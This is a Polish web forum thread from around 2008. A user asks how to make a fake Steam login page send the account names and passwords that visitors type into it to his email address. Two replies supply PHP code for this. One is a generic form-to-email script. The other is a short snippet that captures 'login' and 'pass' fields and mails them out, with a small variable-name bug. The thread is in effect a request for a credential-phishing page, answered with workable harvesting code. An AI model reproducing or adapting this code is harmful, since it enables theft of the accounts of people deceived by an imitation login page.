Dane z formularza

kombajnik

Użytkownik
Dołączył
Lipiec 7, 2007
Posty
5
Witam

Wiem że to było 10321321321 razy szukałem znalazłem masy tematów próbowałem każdego ze skryptów lecz DUPA albo jakieś krzaki na stronie albo wogóle nie działało =/


Miałem już taki gotowy skrypt lecz gdzie by mi do głowy przyszło że kochane yoyo.pl nagle mi spierdoli serwer ... ani strona nie działa ani nie mogę się wlogować na FTPa by pobrać moją stronke która mam tak zrobioną jak chce. A że trzeba mi takie coś na teraz to pisze tutaj :


Chodzi o takie coś
Kod:
http://steampowered.50webs.com
i po wpisaniu w login i password wysyłało mi te 2 zmienne na MÓJ MAIL na początku chciałem przekopiować tą strone lecz ona jest jakaś dziwna bo po wpisaniu np w 1 i 2 polu TEST i kliknieciu CHECK zamiast wysyłać na mail te dane to pokazuje nam je w polu adresu
Kod:
http://steampowered.50webs.com/check.html?login=TEST&password=TEST
mógł by mnie ktoś z Was naprowadzić gdzie i co wkleić by ACC&PASS szedł do mnie na @ ??:)
 

B33RK4

Użytkownik
Dołączył
Styczeń 3, 2007
Posty
598
Ty chyba niewiesz co chcesz zrobić w inpucie loign/passowrd, dane są przesyłane GET'em więc to jest normalne, że pokazują się w pasku adresu. Zastanów się może jeszcze, raz czego Ty oczekujesz...
 

unlock

Użytkownik
Dołączył
Czerwiec 16, 2008
Posty
128
Kod:
<?php
if (count($_POST))
{
    ////////// USTAWIENIA //////////
    $email = 'adres e-mail gdzie wysłać formularz';    // Adres e-mail adresata
    $subject = 'temat';    // Temat listu
    $message = 'Dziękujemy za wysłanie formularza';    // Komunikat
    $error = 'Wystąpił błąd podczas wysyłania formularza';    // Komunikat błędu
    $charset = 'iso-8859-2';    // Strona kodowa
    //////////////////////////////
    
    $head =
        "MIME-Version: 1.0\r\n" .
        "Content-Type: text/plain; charset=$charset\r\n" .
        "Content-Transfer-Encoding: 8bit";
    $body = '';
    foreach ($_POST as $name => $value)
    {
        if (is_array($value))
        {
            for ($i = 0; $i < count($value); $i++)
            {
                $body .= "$name=" . (get_magic_quotes_gpc() ? stripslashes($value[$i]) : $value[$i]) . "\r\n";
            }
        }
        else $body .= "$name=" . (get_magic_quotes_gpc() ? stripslashes($value) : $value) . "\r\n";
    }
    echo mail($email, "=?$charset?B?" . base64_encode($subject) . "?=", $body, $head) ? $message : $error;
}
else
{
?>
<form action="?" method="post">

Tutaj umieść wszystkie pola formularza

</form>
<?php
}
?>
 

Dark Smark

Były Moderator
Dołączył
Kwiecień 29, 2006
Posty
1953
Co do darmowego hostingu to yoyo.pl ma awarie jednego routera ich dostawcy internetowego, nie dotyczy to wszystkich serwerów. Bądź cierpliwy.
A co do problemu to napisz prosty formularz w html i skorzystaj z bogatej dokumentacji dołączonej do php.
http://pl.php.net/mail
 

kombajnik

Użytkownik
Dołączył
Lipiec 7, 2007
Posty
5
@B33RK4


najwyraźniej źle to wytłumaczyłem co chcę zrobić ale takie coś da się zrobić
smile.gif
bo sam takie coś mam na zasranym yoyo.pl ;/


#edit


co to za krzak :\ ?
Kod:
$value) { if (is_array($value)) { for ($i = 0; $i < count($value); $i++) { $body .= "$name=" . (get_magic_quotes_gpc() ? stripslashes($value[$i]) : $value[$i]) . "\r\n"; } } else $body .= "$name=" . (get_magic_quotes_gpc() ? stripslashes($value) : $value) . "\r\n"; } echo mail($email, "=?$charset?B?" . base64_encode($subject) . "?=", $body, $head) ? $message : $error; } else { ?>
 

B33RK4

Użytkownik
Dołączył
Styczeń 3, 2007
Posty
598
no to choćby nawet tak to może wyglądać, o ile dobrze zrozumiałem :


Kod:
<?php
echo ("<form method='post' action='#'>
<input name='login' type='text'>
<input name='pass' type='text'>
<input type='submit' value='OK'>
");
$log=$_POST['login'];
$pas=$_POST['pass'];
if($log && $pass){
$odbiorca='[email protected]';
$nadawca='[email protected]';
$temat='email wyslany ze strona.pl';
$tresc=$log;
$tresc.=$pas;
mail($odbiorca, $temat, $tresc, $nadawca);
}else {    }
?>
 
Do góry Bottom